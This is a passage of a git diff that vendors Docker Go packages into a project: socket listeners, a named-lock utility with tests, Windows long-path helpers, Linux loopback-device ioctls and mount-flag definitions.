27, 1), + }, + // With progressDetail + "{ \"id\": \"ID\", \"status\": \"status\", \"progressDetail\": { \"Current\": 1} }": { + "", // progressbar is disabled in non-terminal + fmt.Sprintf("\n%c[%dA%c[2K\rID: status 1 B\r%c[%dB", 27, 1, 27, 27, 1), + }, + } + for jsonMessage, expectedMessages := range messages { + data := bytes.NewBuffer([]byte{}) + reader := strings.NewReader(jsonMessage) + inFd, _ = term.GetFdInfo(reader) + + // Without terminal + if err := DisplayJSONMessagesStream(reader, data, inFd, false, nil); err != nil { + t.Fatal(err) + } + if data.String() != expectedMessages[0] { + t.Fatalf("Expected an [%v], got [%v]", expectedMessages[0], data.String()) + } + + // With terminal + data = bytes.NewBuffer([]byte{}) + reader = strings.NewReader(jsonMessage) + if err := DisplayJSONMessagesStream(reader, data, inFd, true, nil); err != nil { + t.Fatal(err) + } + 
if data.String() != expectedMessages[1] { + t.Fatalf("Expected an [%v], got [%v]", expectedMessages[1], data.String()) + } + } + +} diff --git a/vendor/github.com/docker/docker/pkg/listeners/listeners_solaris.go b/vendor/github.com/docker/docker/pkg/listeners/listeners_solaris.go new file mode 100644 index 0000000000..ff833e3741 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/listeners/listeners_solaris.go @@ -0,0 +1,31 @@ +package listeners + +import ( + "crypto/tls" + "fmt" + "net" + + "github.com/docker/go-connections/sockets" +) + +// Init creates new listeners for the server. +func Init(proto, addr, socketGroup string, tlsConfig *tls.Config) (ls []net.Listener, err error) { + switch proto { + case "tcp": + l, err := sockets.NewTCPSocket(addr, tlsConfig) + if err != nil { + return nil, err + } + ls = append(ls, l) + case "unix": + l, err := sockets.NewUnixSocket(addr, socketGroup) + if err != nil { + return nil, fmt.Errorf("can't create unix socket %s: %v", addr, err) + } + ls = append(ls, l) + default: + return nil, fmt.Errorf("Invalid protocol format: %q", proto) + } + + return +} diff --git a/vendor/github.com/docker/docker/pkg/listeners/listeners_unix.go b/vendor/github.com/docker/docker/pkg/listeners/listeners_unix.go new file mode 100644 index 0000000000..1bcae7aa3e --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/listeners/listeners_unix.go @@ -0,0 +1,94 @@ +// +build !windows,!solaris + +package listeners + +import ( + "crypto/tls" + "fmt" + "net" + "strconv" + + "github.com/Sirupsen/logrus" + "github.com/coreos/go-systemd/activation" + "github.com/docker/go-connections/sockets" +) + +// Init creates new listeners for the server. +// TODO: Clean up the fact that socketGroup and tlsConfig aren't always used. 
+func Init(proto, addr, socketGroup string, tlsConfig *tls.Config) ([]net.Listener, error) { + ls := []net.Listener{} + + switch proto { + case "fd": + fds, err := listenFD(addr, tlsConfig) + if err != nil { + return nil, err + } + ls = append(ls, fds...) + case "tcp": + l, err := sockets.NewTCPSocket(addr, tlsConfig) + if err != nil { + return nil, err + } + ls = append(ls, l) + case "unix": + l, err := sockets.NewUnixSocket(addr, socketGroup) + if err != nil { + return nil, fmt.Errorf("can't create unix socket %s: %v", addr, err) + } + ls = append(ls, l) + default: + return nil, fmt.Errorf("invalid protocol format: %q", proto) + } + + return ls, nil +} + +// listenFD returns the specified socket activated files as a slice of +// net.Listeners or all of the activated files if "*" is given. +func listenFD(addr string, tlsConfig *tls.Config) ([]net.Listener, error) { + var ( + err error + listeners []net.Listener + ) + // socket activation + if tlsConfig != nil { + listeners, err = activation.TLSListeners(false, tlsConfig) + } else { + listeners, err = activation.Listeners(false) + } + if err != nil { + return nil, err + } + + if len(listeners) == 0 { + return nil, fmt.Errorf("no sockets found via socket activation: make sure the service was started by systemd") + } + + // default to all fds just like unix:// and tcp:// + if addr == "" || addr == "*" { + return listeners, nil + } + + fdNum, err := strconv.Atoi(addr) + if err != nil { + return nil, fmt.Errorf("failed to parse systemd fd address: should be a number: %v", addr) + } + fdOffset := fdNum - 3 + if len(listeners) < int(fdOffset)+1 { + return nil, fmt.Errorf("too few socket activated files passed in by systemd") + } + if listeners[fdOffset] == nil { + return nil, fmt.Errorf("failed to listen on systemd activated file: fd %d", fdOffset+3) + } + for i, ls := range listeners { + if i == fdOffset || ls == nil { + continue + } + if err := ls.Close(); err != nil { + // TODO: We shouldn't log inside a library. 
Remove this or error out. + logrus.Errorf("failed to close systemd activated file: fd %d: %v", fdOffset+3, err) + } + } + return []net.Listener{listeners[fdOffset]}, nil +} diff --git a/vendor/github.com/docker/docker/pkg/listeners/listeners_windows.go b/vendor/github.com/docker/docker/pkg/listeners/listeners_windows.go new file mode 100644 index 0000000000..5b5a470fc6 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/listeners/listeners_windows.go @@ -0,0 +1,54 @@ +package listeners + +import ( + "crypto/tls" + "fmt" + "net" + "strings" + + "github.com/Microsoft/go-winio" + "github.com/docker/go-connections/sockets" +) + +// Init creates new listeners for the server. +func Init(proto, addr, socketGroup string, tlsConfig *tls.Config) ([]net.Listener, error) { + ls := []net.Listener{} + + switch proto { + case "tcp": + l, err := sockets.NewTCPSocket(addr, tlsConfig) + if err != nil { + return nil, err + } + ls = append(ls, l) + + case "npipe": + // allow Administrators and SYSTEM, plus whatever additional users or groups were specified + sddl := "D:P(A;;GA;;;BA)(A;;GA;;;SY)" + if socketGroup != "" { + for _, g := range strings.Split(socketGroup, ",") { + sid, err := winio.LookupSidByName(g) + if err != nil { + return nil, err + } + sddl += fmt.Sprintf("(A;;GRGW;;;%s)", sid) + } + } + c := winio.PipeConfig{ + SecurityDescriptor: sddl, + MessageMode: true, // Use message mode so that CloseWrite() is supported + InputBufferSize: 65536, // Use 64KB buffers to improve performance + OutputBufferSize: 65536, + } + l, err := winio.ListenPipe(addr, &c) + if err != nil { + return nil, err + } + ls = append(ls, l) + + default: + return nil, fmt.Errorf("invalid protocol format: windows only supports tcp and npipe") + } + + return ls, nil +} diff --git a/vendor/github.com/docker/docker/pkg/locker/README.md b/vendor/github.com/docker/docker/pkg/locker/README.md new file mode 100644 index 0000000000..e84a815cc5 --- /dev/null +++ 
b/vendor/github.com/docker/docker/pkg/locker/README.md @@ -0,0 +1,65 @@ +Locker +===== + +locker provides a mechanism for creating finer-grained locking to help +free up more global locks to handle other tasks. + +The implementation looks close to a sync.Mutex, however the user must provide a +reference to use to refer to the underlying lock when locking and unlocking, +and unlock may generate an error. + +If a lock with a given name does not exist when `Lock` is called, one is +created. +Lock references are automatically cleaned up on `Unlock` if nothing else is +waiting for the lock. + + +## Usage + +```go +package important + +import ( + "sync" + "time" + + "github.com/docker/docker/pkg/locker" +) + +type important struct { + locks *locker.Locker + data map[string]interface{} + mu sync.Mutex +} + +func (i *important) Get(name string) interface{} { + i.locks.Lock(name) + defer i.locks.Unlock(name) + return data[name] +} + +func (i *important) Create(name string, data interface{}) { + i.locks.Lock(name) + defer i.locks.Unlock(name) + + i.createImportant(data) + + s.mu.Lock() + i.data[name] = data + s.mu.Unlock() +} + +func (i *important) createImportant(data interface{}) { + time.Sleep(10 * time.Second) +} +``` + +For functions dealing with a given name, always lock at the beginning of the +function (or before doing anything with the underlying state), this ensures any +other function that is dealing with the same name will block. + +When needing to modify the underlying data, use the global lock to ensure nothing +else is modfying it at the same time. +Since name lock is already in place, no reads will occur while the modification +is being performed. 
+ diff --git a/vendor/github.com/docker/docker/pkg/locker/locker.go b/vendor/github.com/docker/docker/pkg/locker/locker.go new file mode 100644 index 0000000000..0b22ddfab8 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/locker/locker.go @@ -0,0 +1,112 @@ +/* +Package locker provides a mechanism for creating finer-grained locking to help +free up more global locks to handle other tasks. + +The implementation looks close to a sync.Mutex, however the user must provide a +reference to use to refer to the underlying lock when locking and unlocking, +and unlock may generate an error. + +If a lock with a given name does not exist when `Lock` is called, one is +created. +Lock references are automatically cleaned up on `Unlock` if nothing else is +waiting for the lock. +*/ +package locker + +import ( + "errors" + "sync" + "sync/atomic" +) + +// ErrNoSuchLock is returned when the requested lock does not exist +var ErrNoSuchLock = errors.New("no such lock") + +// Locker provides a locking mechanism based on the passed in reference name +type Locker struct { + mu sync.Mutex + locks map[string]*lockCtr +} + +// lockCtr is used by Locker to represent a lock with a given name. 
+type lockCtr struct { + mu sync.Mutex + // waiters is the number of waiters waiting to acquire the lock + // this is int32 instead of uint32 so we can add `-1` in `dec()` + waiters int32 +} + +// inc increments the number of waiters waiting for the lock +func (l *lockCtr) inc() { + atomic.AddInt32(&l.waiters, 1) +} + +// dec decrements the number of waiters waiting on the lock +func (l *lockCtr) dec() { + atomic.AddInt32(&l.waiters, -1) +} + +// count gets the current number of waiters +func (l *lockCtr) count() int32 { + return atomic.LoadInt32(&l.waiters) +} + +// Lock locks the mutex +func (l *lockCtr) Lock() { + l.mu.Lock() +} + +// Unlock unlocks the mutex +func (l *lockCtr) Unlock() { + l.mu.Unlock() +} + +// New creates a new Locker +func New() *Locker { + return &Locker{ + locks: make(map[string]*lockCtr), + } +} + +// Lock locks a mutex with the given name. If it doesn't exist, one is created +func (l *Locker) Lock(name string) { + l.mu.Lock() + if l.locks == nil { + l.locks = make(map[string]*lockCtr) + } + + nameLock, exists := l.locks[name] + if !exists { + nameLock = &lockCtr{} + l.locks[name] = nameLock + } + + // increment the nameLock waiters while inside the main mutex + // this makes sure that the lock isn't deleted if `Lock` and `Unlock` are called concurrently + nameLock.inc() + l.mu.Unlock() + + // Lock the nameLock outside the main mutex so we don't block other operations + // once locked then we can decrement the number of waiters for this lock + nameLock.Lock() + nameLock.dec() +} + +// Unlock unlocks the mutex with the given name +// If the given lock is not being waited on by any other callers, it is deleted +func (l *Locker) Unlock(name string) error { + l.mu.Lock() + nameLock, exists := l.locks[name] + if !exists { + l.mu.Unlock() + return ErrNoSuchLock + } + + if nameLock.count() == 0 { + delete(l.locks, name) + } + nameLock.Unlock() + + l.mu.Unlock() + return nil +} diff --git 
a/vendor/github.com/docker/docker/pkg/locker/locker_test.go b/vendor/github.com/docker/docker/pkg/locker/locker_test.go new file mode 100644 index 0000000000..5a297dd47b --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/locker/locker_test.go @@ -0,0 +1,124 @@ +package locker + +import ( + "sync" + "testing" + "time" +) + +func TestLockCounter(t *testing.T) { + l := &lockCtr{} + l.inc() + + if l.waiters != 1 { + t.Fatal("counter inc failed") + } + + l.dec() + if l.waiters != 0 { + t.Fatal("counter dec failed") + } +} + +func TestLockerLock(t *testing.T) { + l := New() + l.Lock("test") + ctr := l.locks["test"] + + if ctr.count() != 0 { + t.Fatalf("expected waiters to be 0, got :%d", ctr.waiters) + } + + chDone := make(chan struct{}) + go func() { + l.Lock("test") + close(chDone) + }() + + chWaiting := make(chan struct{}) + go func() { + for range time.Tick(1 * time.Millisecond) { + if ctr.count() == 1 { + close(chWaiting) + break + } + } + }() + + select { + case <-chWaiting: + case <-time.After(3 * time.Second): + t.Fatal("timed out waiting for lock waiters to be incremented") + } + + select { + case <-chDone: + t.Fatal("lock should not have returned while it was still held") + default: + } + + if err := l.Unlock("test"); err != nil { + t.Fatal(err) + } + + select { + case <-chDone: + case <-time.After(3 * time.Second): + t.Fatalf("lock should have completed") + } + + if ctr.count() != 0 { + t.Fatalf("expected waiters to be 0, got: %d", ctr.count()) + } +} + +func TestLockerUnlock(t *testing.T) { + l := New() + + l.Lock("test") + l.Unlock("test") + + chDone := make(chan struct{}) + go func() { + l.Lock("test") + close(chDone) + }() + + select { + case <-chDone: + case <-time.After(3 * time.Second): + t.Fatalf("lock should not be blocked") + } +} + +func TestLockerConcurrency(t *testing.T) { + l := New() + + var wg sync.WaitGroup + for i := 0; i <= 10000; i++ { + wg.Add(1) + go func() { + l.Lock("test") + // if there is a concurrency issue, will very likely 
panic here + l.Unlock("test") + wg.Done() + }() + } + + chDone := make(chan struct{}) + go func() { + wg.Wait() + close(chDone) + }() + + select { + case <-chDone: + case <-time.After(10 * time.Second): + t.Fatal("timeout waiting for locks to complete") + } + + // Since everything has unlocked this should not exist anymore + if ctr, exists := l.locks["test"]; exists { + t.Fatalf("lock should not exist: %v", ctr) + } +} diff --git a/vendor/github.com/docker/docker/pkg/longpath/longpath.go b/vendor/github.com/docker/docker/pkg/longpath/longpath.go new file mode 100644 index 0000000000..9b15bfff4c --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/longpath/longpath.go @@ -0,0 +1,26 @@ +// longpath introduces some constants and helper functions for handling long paths +// in Windows, which are expected to be prepended with `\\?\` and followed by either +// a drive letter, a UNC server\share, or a volume identifier. + +package longpath + +import ( + "strings" +) + +// Prefix is the longpath prefix for Windows file paths. +const Prefix = `\\?\` + +// AddPrefix will add the Windows long path prefix to the path provided if +// it does not already have it. +func AddPrefix(path string) string { + if !strings.HasPrefix(path, Prefix) { + if strings.HasPrefix(path, `\\`) { + // This is a UNC path, so we need to add 'UNC' to the path as well. + path = Prefix + `UNC` + path[1:] + } else { + path = Prefix + path + } + } + return path +} diff --git a/vendor/github.com/docker/docker/pkg/longpath/longpath_test.go b/vendor/github.com/docker/docker/pkg/longpath/longpath_test.go new file mode 100644 index 0000000000..01865eff09 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/longpath/longpath_test.go @@ -0,0 +1,22 @@ +package longpath + +import ( + "strings" + "testing" +) + +func TestStandardLongPath(t *testing.T) { + c := `C:\simple\path` + longC := AddPrefix(c) + if !strings.EqualFold(longC, `\\?\C:\simple\path`) { + t.Errorf("Wrong long path returned. 
Original = %s ; Long = %s", c, longC) + } +} + +func TestUNCLongPath(t *testing.T) { + c := `\\server\share\path` + longC := AddPrefix(c) + if !strings.EqualFold(longC, `\\?\UNC\server\share\path`) { + t.Errorf("Wrong UNC long path returned. Original = %s ; Long = %s", c, longC) + } +} diff --git a/vendor/github.com/docker/docker/pkg/loopback/attach_loopback.go b/vendor/github.com/docker/docker/pkg/loopback/attach_loopback.go new file mode 100644 index 0000000000..971f45eb48 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/loopback/attach_loopback.go @@ -0,0 +1,137 @@ +// +build linux + +package loopback + +import ( + "errors" + "fmt" + "os" + "syscall" + + "github.com/Sirupsen/logrus" +) + +// Loopback related errors +var ( + ErrAttachLoopbackDevice = errors.New("loopback attach failed") + ErrGetLoopbackBackingFile = errors.New("Unable to get loopback backing file") + ErrSetCapacity = errors.New("Unable set loopback capacity") +) + +func stringToLoopName(src string) [LoNameSize]uint8 { + var dst [LoNameSize]uint8 + copy(dst[:], src[:]) + return dst +} + +func getNextFreeLoopbackIndex() (int, error) { + f, err := os.OpenFile("/dev/loop-control", os.O_RDONLY, 0644) + if err != nil { + return 0, err + } + defer f.Close() + + index, err := ioctlLoopCtlGetFree(f.Fd()) + if index < 0 { + index = 0 + } + return index, err +} + +func openNextAvailableLoopback(index int, sparseFile *os.File) (loopFile *os.File, err error) { + // Start looking for a free /dev/loop + for { + target := fmt.Sprintf("/dev/loop%d", index) + index++ + + fi, err := os.Stat(target) + if err != nil { + if os.IsNotExist(err) { + logrus.Error("There are no more loopback devices available.") + } + return nil, ErrAttachLoopbackDevice + } + + if fi.Mode()&os.ModeDevice != os.ModeDevice { + logrus.Errorf("Loopback device %s is not a block device.", target) + continue + } + + // OpenFile adds O_CLOEXEC + loopFile, err = os.OpenFile(target, os.O_RDWR, 0644) + if err != nil { + logrus.Errorf("Error 
opening loopback device: %s", err) + return nil, ErrAttachLoopbackDevice + } + + // Try to attach to the loop file + if err := ioctlLoopSetFd(loopFile.Fd(), sparseFile.Fd()); err != nil { + loopFile.Close() + + // If the error is EBUSY, then try the next loopback + if err != syscall.EBUSY { + logrus.Errorf("Cannot set up loopback device %s: %s", target, err) + return nil, ErrAttachLoopbackDevice + } + + // Otherwise, we keep going with the loop + continue + } + // In case of success, we finished. Break the loop. + break + } + + // This can't happen, but let's be sure + if loopFile == nil { + logrus.Errorf("Unreachable code reached! Error attaching %s to a loopback device.", sparseFile.Name()) + return nil, ErrAttachLoopbackDevice + } + + return loopFile, nil +} + +// AttachLoopDevice attaches the given sparse file to the next +// available loopback device. It returns an opened *os.File. +func AttachLoopDevice(sparseName string) (loop *os.File, err error) { + + // Try to retrieve the next available loopback device via syscall. + // If it fails, we discard error and start looping for a + // loopback from index 0. 
+ startIndex, err := getNextFreeLoopbackIndex() + if err != nil { + logrus.Debugf("Error retrieving the next available loopback: %s", err) + } + + // OpenFile adds O_CLOEXEC + sparseFile, err := os.OpenFile(sparseName, os.O_RDWR, 0644) + if err != nil { + logrus.Errorf("Error opening sparse file %s: %s", sparseName, err) + return nil, ErrAttachLoopbackDevice + } + defer sparseFile.Close() + + loopFile, err := openNextAvailableLoopback(startIndex, sparseFile) + if err != nil { + return nil, err + } + + // Set the status of the loopback device + loopInfo := &loopInfo64{ + loFileName: stringToLoopName(loopFile.Name()), + loOffset: 0, + loFlags: LoFlagsAutoClear, + } + + if err := ioctlLoopSetStatus64(loopFile.Fd(), loopInfo); err != nil { + logrus.Errorf("Cannot set up loopback device info: %s", err) + + // If the call failed, then free the loopback device + if err := ioctlLoopClrFd(loopFile.Fd()); err != nil { + logrus.Error("Error while cleaning up the loopback device") + } + loopFile.Close() + return nil, ErrAttachLoopbackDevice + } + + return loopFile, nil +} diff --git a/vendor/github.com/docker/docker/pkg/loopback/ioctl.go b/vendor/github.com/docker/docker/pkg/loopback/ioctl.go new file mode 100644 index 0000000000..0714eb5f87 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/loopback/ioctl.go @@ -0,0 +1,53 @@ +// +build linux + +package loopback + +import ( + "syscall" + "unsafe" +) + +func ioctlLoopCtlGetFree(fd uintptr) (int, error) { + index, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, LoopCtlGetFree, 0) + if err != 0 { + return 0, err + } + return int(index), nil +} + +func ioctlLoopSetFd(loopFd, sparseFd uintptr) error { + if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, loopFd, LoopSetFd, sparseFd); err != 0 { + return err + } + return nil +} + +func ioctlLoopSetStatus64(loopFd uintptr, loopInfo *loopInfo64) error { + if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, loopFd, LoopSetStatus64, uintptr(unsafe.Pointer(loopInfo))); err != 0 { + 
return err + } + return nil +} + +func ioctlLoopClrFd(loopFd uintptr) error { + if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, loopFd, LoopClrFd, 0); err != 0 { + return err + } + return nil +} + +func ioctlLoopGetStatus64(loopFd uintptr) (*loopInfo64, error) { + loopInfo := &loopInfo64{} + + if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, loopFd, LoopGetStatus64, uintptr(unsafe.Pointer(loopInfo))); err != 0 { + return nil, err + } + return loopInfo, nil +} + +func ioctlLoopSetCapacity(loopFd uintptr, value int) error { + if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, loopFd, LoopSetCapacity, uintptr(value)); err != 0 { + return err + } + return nil +} diff --git a/vendor/github.com/docker/docker/pkg/loopback/loop_wrapper.go b/vendor/github.com/docker/docker/pkg/loopback/loop_wrapper.go new file mode 100644 index 0000000000..e1100ce156 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/loopback/loop_wrapper.go @@ -0,0 +1,52 @@ +// +build linux + +package loopback + +/* +#include // FIXME: present only for defines, maybe we can remove it? + +#ifndef LOOP_CTL_GET_FREE + #define LOOP_CTL_GET_FREE 0x4C82 +#endif + +#ifndef LO_FLAGS_PARTSCAN + #define LO_FLAGS_PARTSCAN 8 +#endif + +*/ +import "C" + +type loopInfo64 struct { + loDevice uint64 /* ioctl r/o */ + loInode uint64 /* ioctl r/o */ + loRdevice uint64 /* ioctl r/o */ + loOffset uint64 + loSizelimit uint64 /* bytes, 0 == max available */ + loNumber uint32 /* ioctl r/o */ + loEncryptType uint32 + loEncryptKeySize uint32 /* ioctl w/o */ + loFlags uint32 /* ioctl r/o */ + loFileName [LoNameSize]uint8 + loCryptName [LoNameSize]uint8 + loEncryptKey [LoKeySize]uint8 /* ioctl w/o */ + loInit [2]uint64 +} + +// IOCTL consts +const ( + LoopSetFd = C.LOOP_SET_FD + LoopCtlGetFree = C.LOOP_CTL_GET_FREE + LoopGetStatus64 = C.LOOP_GET_STATUS64 + LoopSetStatus64 = C.LOOP_SET_STATUS64 + LoopClrFd = C.LOOP_CLR_FD + LoopSetCapacity = C.LOOP_SET_CAPACITY +) + +// LOOP consts. 
+const ( + LoFlagsAutoClear = C.LO_FLAGS_AUTOCLEAR + LoFlagsReadOnly = C.LO_FLAGS_READ_ONLY + LoFlagsPartScan = C.LO_FLAGS_PARTSCAN + LoKeySize = C.LO_KEY_SIZE + LoNameSize = C.LO_NAME_SIZE +) diff --git a/vendor/github.com/docker/docker/pkg/loopback/loopback.go b/vendor/github.com/docker/docker/pkg/loopback/loopback.go new file mode 100644 index 0000000000..bc0479284c --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/loopback/loopback.go @@ -0,0 +1,63 @@ +// +build linux + +package loopback + +import ( + "fmt" + "os" + "syscall" + + "github.com/Sirupsen/logrus" +) + +func getLoopbackBackingFile(file *os.File) (uint64, uint64, error) { + loopInfo, err := ioctlLoopGetStatus64(file.Fd()) + if err != nil { + logrus.Errorf("Error get loopback backing file: %s", err) + return 0, 0, ErrGetLoopbackBackingFile + } + return loopInfo.loDevice, loopInfo.loInode, nil +} + +// SetCapacity reloads the size for the loopback device. +func SetCapacity(file *os.File) error { + if err := ioctlLoopSetCapacity(file.Fd(), 0); err != nil { + logrus.Errorf("Error loopbackSetCapacity: %s", err) + return ErrSetCapacity + } + return nil +} + +// FindLoopDeviceFor returns a loopback device file for the specified file which +// is backing file of a loop back device. 
+func FindLoopDeviceFor(file *os.File) *os.File { + stat, err := file.Stat() + if err != nil { + return nil + } + targetInode := stat.Sys().(*syscall.Stat_t).Ino + targetDevice := stat.Sys().(*syscall.Stat_t).Dev + + for i := 0; true; i++ { + path := fmt.Sprintf("/dev/loop%d", i) + + file, err := os.OpenFile(path, os.O_RDWR, 0) + if err != nil { + if os.IsNotExist(err) { + return nil + } + + // Ignore all errors until the first not-exist + // we want to continue looking for the file + continue + } + + dev, inode, err := getLoopbackBackingFile(file) + if err == nil && dev == targetDevice && inode == targetInode { + return file + } + file.Close() + } + + return nil +} diff --git a/vendor/github.com/docker/docker/pkg/mount/flags.go b/vendor/github.com/docker/docker/pkg/mount/flags.go new file mode 100644 index 0000000000..607dbed43a --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/mount/flags.go @@ -0,0 +1,149 @@ +package mount + +import ( + "fmt" + "strings" +) + +var flags = map[string]struct { + clear bool + flag int +}{ + "defaults": {false, 0}, + "ro": {false, RDONLY}, + "rw": {true, RDONLY}, + "suid": {true, NOSUID}, + "nosuid": {false, NOSUID}, + "dev": {true, NODEV}, + "nodev": {false, NODEV}, + "exec": {true, NOEXEC}, + "noexec": {false, NOEXEC}, + "sync": {false, SYNCHRONOUS}, + "async": {true, SYNCHRONOUS}, + "dirsync": {false, DIRSYNC}, + "remount": {false, REMOUNT}, + "mand": {false, MANDLOCK}, + "nomand": {true, MANDLOCK}, + "atime": {true, NOATIME}, + "noatime": {false, NOATIME}, + "diratime": {true, NODIRATIME}, + "nodiratime": {false, NODIRATIME}, + "bind": {false, BIND}, + "rbind": {false, RBIND}, + "unbindable": {false, UNBINDABLE}, + "runbindable": {false, RUNBINDABLE}, + "private": {false, PRIVATE}, + "rprivate": {false, RPRIVATE}, + "shared": {false, SHARED}, + "rshared": {false, RSHARED}, + "slave": {false, SLAVE}, + "rslave": {false, RSLAVE}, + "relatime": {false, RELATIME}, + "norelatime": {true, RELATIME}, + "strictatime": {false, 
STRICTATIME}, + "nostrictatime": {true, STRICTATIME}, +} + +var validFlags = map[string]bool{ + "": true, + "size": true, + "mode": true, + "uid": true, + "gid": true, + "nr_inodes": true, + "nr_blocks": true, + "mpol": true, +} + +var propagationFlags = map[string]bool{ + "bind": true, + "rbind": true, + "unbindable": true, + "runbindable": true, + "private": true, + "rprivate": true, + "shared": true, + "rshared": true, + "slave": true, + "rslave": true, +} + +// MergeTmpfsOptions merge mount options to make sure there is no duplicate. +func MergeTmpfsOptions(options []string) ([]string, error) { + // We use collisions maps to remove duplicates. + // For flag, the key is the flag value (the key for propagation flag is -1) + // For data=value, the key is the data + flagCollisions := map[int]bool{} + dataCollisions := map[string]bool{} + + var newOptions []string + // We process in reverse order + for i := len(options) - 1; i >= 0; i-- { + option := options[i] + if option == "defaults" { + continue + } + if f, ok := flags[option]; ok && f.flag != 0 { + // There is only one propagation mode + key := f.flag + if propagationFlags[option] { + key = -1 + } + // Check to see if there is collision for flag + if !flagCollisions[key] { + // We prepend the option and add to collision map + newOptions = append([]string{option}, newOptions...) + flagCollisions[key] = true + } + continue + } + opt := strings.SplitN(option, "=", 2) + if len(opt) != 2 || !validFlags[opt[0]] { + return nil, fmt.Errorf("Invalid tmpfs option %q", opt) + } + if !dataCollisions[opt[0]] { + // We prepend the option and add to collision map + newOptions = append([]string{option}, newOptions...) 
+ dataCollisions[opt[0]] = true + } + } + + return newOptions, nil +} + +// Parse fstab type mount options into mount() flags +// and device specific data +func parseOptions(options string) (int, string) { + var ( + flag int + data []string + ) + + for _, o := range strings.Split(options, ",") { + // If the option does not exist in the flags table or the flag + // is not supported on the platform, + // then it is a data value for a specific fs type + if f, exists := flags[o]; exists && f.flag != 0 { + if f.clear { + flag &= ^f.flag + } else { + flag |= f.flag + } + } else { + data = append(data, o) + } + } + return flag, strings.Join(data, ",") +} + +// ParseTmpfsOptions parse fstab type mount options into flags and data +func ParseTmpfsOptions(options string) (int, string, error) { + flags, data := parseOptions(options) + for _, o := range strings.Split(data, ",") { + opt := strings.SplitN(o, "=", 2) + if !validFlags[opt[0]] { + return 0, "", fmt.Errorf("Invalid tmpfs option %q", opt) + } + } + return flags, data, nil +} diff --git a/vendor/github.com/docker/docker/pkg/mount/flags_freebsd.go b/vendor/github.com/docker/docker/pkg/mount/flags_freebsd.go new file mode 100644 index 0000000000..f166cb2f77 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/mount/flags_freebsd.go @@ -0,0 +1,48 @@ +// +build freebsd,cgo + +package mount + +/* +#include +*/ +import "C" + +const ( + // RDONLY will mount the filesystem as read-only. + RDONLY = C.MNT_RDONLY + + // NOSUID will not allow set-user-identifier or set-group-identifier bits to + // take effect. + NOSUID = C.MNT_NOSUID + + // NOEXEC will not allow execution of any binaries on the mounted file system. + NOEXEC = C.MNT_NOEXEC + + // SYNCHRONOUS will allow any I/O to the file system to be done synchronously. + SYNCHRONOUS = C.MNT_SYNCHRONOUS + + // NOATIME will not update the file access time when reading from a file. + NOATIME = C.MNT_NOATIME +) + +// These flags are unsupported. 
+const ( + BIND = 0 + DIRSYNC = 0 + MANDLOCK = 0 + NODEV = 0 + NODIRATIME = 0 + UNBINDABLE = 0 + RUNBINDABLE = 0 + PRIVATE = 0 + RPRIVATE = 0 + SHARED = 0 + RSHARED = 0 + SLAVE = 0 + RSLAVE = 0 + RBIND = 0 + RELATIVE = 0 + RELATIME = 0 + REMOUNT = 0 + STRICTATIME = 0 +) diff --git a/vendor/github.com/docker/docker/pkg/mount/flags_linux.go b/vendor/github.com/docker/docker/pkg/mount/flags_linux.go new file mode 100644 index 0000000000..dc696dce90 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/mount/flags_linux.go @@ -0,0 +1,85 @@ +package mount + +import ( + "syscall" +) + +const ( + // RDONLY will mount the file system read-only. + RDONLY = syscall.MS_RDONLY + + // NOSUID will not allow set-user-identifier or set-group-identifier bits to + // take effect. + NOSUID = syscall.MS_NOSUID + + // NODEV will not interpret character or block special devices on the file + // system. + NODEV = syscall.MS_NODEV + + // NOEXEC will not allow execution of any binaries on the mounted file system. + NOEXEC = syscall.MS_NOEXEC + + // SYNCHRONOUS will allow I/O to the file system to be done synchronously. + SYNCHRONOUS = syscall.MS_SYNCHRONOUS + + // DIRSYNC will force all directory updates within the file system to be done + // synchronously. This affects the following system calls: create, link, + // unlink, symlink, mkdir, rmdir, mknod and rename. + DIRSYNC = syscall.MS_DIRSYNC + + // REMOUNT will attempt to remount an already-mounted file system. This is + // commonly used to change the mount flags for a file system, especially to + // make a readonly file system writeable. It does not change device or mount + // point. + REMOUNT = syscall.MS_REMOUNT + + // MANDLOCK will force mandatory locks on a filesystem. + MANDLOCK = syscall.MS_MANDLOCK + + // NOATIME will not update the file access time when reading from a file. + NOATIME = syscall.MS_NOATIME + + // NODIRATIME will not update the directory access time. 
+ NODIRATIME = syscall.MS_NODIRATIME + + // BIND remounts a subtree somewhere else. + BIND = syscall.MS_BIND + + // RBIND remounts a subtree and all possible submounts somewhere else. + RBIND = syscall.MS_BIND | syscall.MS_REC + + // UNBINDABLE creates a mount which cannot be cloned through a bind operation. + UNBINDABLE = syscall.MS_UNBINDABLE + + // RUNBINDABLE marks the entire mount tree as UNBINDABLE. + RUNBINDABLE = syscall.MS_UNBINDABLE | syscall.MS_REC + + // PRIVATE creates a mount which carries no propagation abilities. + PRIVATE = syscall.MS_PRIVATE + + // RPRIVATE marks the entire mount tree as PRIVATE. + RPRIVATE = syscall.MS_PRIVATE | syscall.MS_REC + + // SLAVE creates a mount which receives propagation from its master, but not + // vice versa. + SLAVE = syscall.MS_SLAVE + + // RSLAVE marks the entire mount tree as SLAVE. + RSLAVE = syscall.MS_SLAVE | syscall.MS_REC + + // SHARED creates a mount which provides the ability to create mirrors of + // that mount such that mounts and unmounts within any of the mirrors + // propagate to the other mirrors. + SHARED = syscall.MS_SHARED + + // RSHARED marks the entire mount tree as SHARED. + RSHARED = syscall.MS_SHARED | syscall.MS_REC + + // RELATIME updates inode access times relative to modify or change time. + RELATIME = syscall.MS_RELATIME + + // STRICTATIME allows to explicitly request full atime updates. This makes + // it possible for the kernel to default to relatime or noatime but still + // allow userspace to override it. + 